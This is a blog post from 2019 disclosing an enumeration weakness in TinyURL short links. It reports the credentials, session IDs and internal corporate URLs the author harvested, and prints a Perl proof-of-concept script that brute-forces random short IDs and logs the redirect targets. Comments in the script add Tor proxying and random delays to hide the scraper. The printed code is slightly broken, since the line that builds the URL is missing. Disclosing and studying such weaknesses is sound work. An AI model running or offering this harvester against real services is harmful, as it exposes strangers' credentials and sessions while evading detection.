TinyURL

Unauthorized TinyURL URL Enumeration Vulnerability

Rebecca Lori Written by Rebecca Lori
Last updated on April 8, 2019

I am sure everyone has heard and used TinyUrl before. If you don’t know, TinyURL is kind of a web service that provides short aliases for easy redirection to long urls. The service is completely free and hence most people are tempted to use it. It solves the hard problem of remembering overly long urls.

There have been security vulnerabilities reported in TinyURL in the past, one of them is discussed by security researchers Pdp and Kuza55 here and here.

I would like to discuss another vulnerability here. I see an authorization issue with the way these user generated urls are accessible to anyone. Anyone can write a simple automated script to enumerate a large set of urls. The proof of concept code is shown below. I ran this script for a short while and was amused to see the amount of sensitive personal information that people unknowingly left in the URLs.

Some of the things I found include

  1. Username and Passwords in URLs : Weak web apps using credentials in GET still exist.
  2. Intranet URLs of Giant Corporations : Internal apps are generally not written with security in mind (fallible employee trust rule). Also, I see many urls that refer to internal company projects, bug databases, etc.
  3. Session ID in URLs : Many apps still pass session identifier as part of url. If the session identifier is active, your session can be easily hijacked.
  4. Spam URLs : This has been discussed many times in different places. Examples here and here.
  5. Resource Enumeration: I haven’t verified this, but definitely see it as a problem. If the resource pointed by the url is not protected by proper access controls, then an attacker can easily access it. Attacker does not need to guess the overly long url.

 

01.#TinyURL URL Enumeration Script
02.#By Inferno {at} Securethoughts.com
03.
04.use IO::Handle;
05.use LWP::UserAgent;
06.use Time::HiRes qw( sleep );
07.
08.my $ua = LWP::UserAgent->new;
09.$ua->max_redirect(1);
10.
11.#If you want to use Tor to protect your identity.
12.#$ua->proxy([‘http’], ‘http://127.0.0.1:8118/’);
13.
14.my $nd=””;      # Length of ID
15.my $num=””;     # Value of ID
16.my $url=””;     # TinyURL Redirection Script Call
17.my $content=””; # HTTP Response from Redirection
18.my $temp=””;    # Temporary Variable
19.
20.open FILE, “>>:utf8”, “tinyurl.out” or die(“Cannot open file for output”);
21.while(1)
22.{
23.# Pick up a random ID length and value
24.$nd=int(rand(8))+1;
25.$num=””;
26.for($i=1;$i<=$nd;$i++)
27.{
28.$s=int(rand(36));
29.$num.=($s>9)?chr($s+55):$s;
30.}
31.
32.$temp=”Processing “.$num.”n”;
33.syswrite(STDOUT, $temp, length($temp));
34.
35.# Construct the TinyURL Redirection URL
37.
38.my $request = new HTTP::Request(“GET”, $url);
39.my $response = $ua->request($request);
40.$content=$response->as_string;
41.
42.# Check if a Location Header is present & write the URL.
43.if($content =~ m/(Location: )(.*)/i)
44.{
45.$temp=$num.” “.$2.”n”;
46.syswrite(FILE, $temp, length($temp));
47.}
48.
49.#Use this if you want to hide you tracks with a random delay
50.#sleep((int(rand(500))/100.0));
51.}
52.close (FILE);
53.exit 0;

Article comments